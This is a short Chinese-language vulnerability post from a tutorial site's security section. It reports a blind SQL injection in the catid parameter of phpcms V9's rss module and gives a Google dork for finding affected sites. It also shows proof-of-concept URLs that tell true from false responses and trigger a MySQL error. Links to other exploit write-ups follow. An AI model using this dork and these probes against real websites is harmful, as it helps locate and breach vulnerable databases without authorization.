手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpcms V9 BLind SQL 注入漏洞0day
phpcms V9 BLind SQL 注入漏洞0day
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...

影响版本:phpcms v9 blind

官方网站:http://www.phpcms.cn

漏洞类型:SQL注入

漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

google dork:inurl:"index.php?m=content+c=rss+catid=10"

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

【phpcms V9 BLind SQL 注入漏洞0day】相关文章:

MirOS BSD Korn Shell本地权限提升漏洞

BBSXP2008存在后台注射漏洞

Toshiba Surveillix ActiveX 控件远程栈溢出漏洞

Gh0st控制端逻辑漏洞

Microsoft Windows GDI文件名解析栈溢出漏洞(MS08-021)

BBSXP绕过过滤继续注入漏洞分析

Linux Kiss Server lks.c文件多个格式串处理漏洞

dedecms 5.6的最新注入漏洞

PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

Unix主机安全漏洞分析

精品推荐
分类导航